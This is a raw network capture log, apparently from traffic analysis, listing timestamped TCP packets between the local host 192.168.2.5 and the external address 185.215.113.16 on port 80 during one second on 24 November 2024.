                                                                                                                                                                                                Nov 24, 2024 03:04:30.984679937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.984787941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.984853983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.986460924 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.986515999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.986566067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.988271952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.988321066 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.988347054 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.990034103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.990082026 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.990148067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.991828918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.991872072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.991902113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.993588924 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.993637085 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.993669987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.995373964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.995421886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.995472908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.997138977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:30.997188091 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.078613997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.078715086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.078929901 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.079519033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.079632044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.079938889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.081298113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.081397057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.081542015 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.083065987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.115853071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.115875006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.115938902 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.116457939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.116528034 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.116744041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.116898060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.116945028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.118154049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.118196011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.118247986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.119477987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.119575977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.119621992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.120846033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.120934963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.120987892 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.122174025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.122277021 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.122324944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.123518944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.123631954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.123826027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.124885082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.124991894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.125037909 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.126224995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.126338959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.126395941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.127573967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.127625942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.127681971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.128947973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.129040003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.129086971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.130280018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.130384922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.130439997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.131618023 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.131716967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.131762028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.132983923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.133070946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.133131027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.134305000 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.134421110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.134464025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.135668993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.135796070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.135957003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.137119055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.137228012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.137428999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.138381004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.138487101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.138545990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.139796972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.139889956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.139988899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.141067028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.141156912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.141201973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.142416954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.142528057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.142576933 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.143953085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.143970013 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.144037962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.145123005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.145215988 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.145267010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.146454096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.146569014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.146615028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.147804022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.147912025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.147964001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.149178982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.149272919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.149319887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.150511980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.150619030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.150665045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.151863098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.151895046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.151932001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.153220892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.153321981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.153368950 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.154542923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.154649019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.154707909 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.155946970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.156030893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.156081915 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.157252073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.157361984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.157416105 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.158607006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.158724070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.158776045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.159989119 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.160070896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.161326885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.161384106 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.161444902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.161922932 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.162652969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.162765026 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.162813902 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.164019108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.164120913 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.164164066 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.165349007 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.165477991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.165522099 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.166696072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.166829109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.166868925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.168066025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.168179989 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.168221951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.169445038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.169579983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.169625998 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.170769930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.170851946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.170897007 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.172106981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.172221899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.172266006 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.173451900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.173572063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.173614025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.174799919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.174891949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.174933910 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.176175117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.176270962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.176312923 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.177542925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.177685022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.177866936 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.178869009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.178988934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.179033995 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.180196047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.180248976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.180288076 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.181714058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.181725025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.181776047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.279917955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.279979944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.280061960 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.280288935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.280395031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.280438900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.281646967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.281733990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.281780958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.283035040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.283081055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.283124924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.317037106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.317133904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.317215919 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.317622900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.318169117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.318218946 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.318227053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.319076061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.319125891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.319171906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.320255995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.320307970 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.320379972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.321455002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.321501970 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.321557999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.322647095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.322700024 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.322734118 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.323865891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.323910952 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.323973894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.325043917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.325155973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.325170040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.326258898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.326334953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.326373100 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.327435970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.327491045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.327543974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.328664064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.328712940 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.328732014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.329817057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.329881907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.329938889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.331027985 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.331074953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.331129074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.332232952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.332331896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.332356930 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.333409071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.333477020 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.333503962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.334606886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.334650040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.334705114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.335822105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.335901022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.335925102 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.336997986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.337102890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.337145090 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.338196993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.338263035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.338309050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.339411974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.339468956 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.339499950 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.340612888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.340662003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.340706110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.341803074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.341903925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.342124939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.342995882 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.343091965 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.343111992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.344186068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.344276905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.344301939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.345376968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.345424891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.345477104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.346591949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.346642971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.346669912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.347795010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.347856045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.347882032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.348973989 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.349026918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.349076033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.350203991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.350255013 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.350312948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.351443052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.351455927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.351494074 CET4972980192.168.2.5185.215.113.16
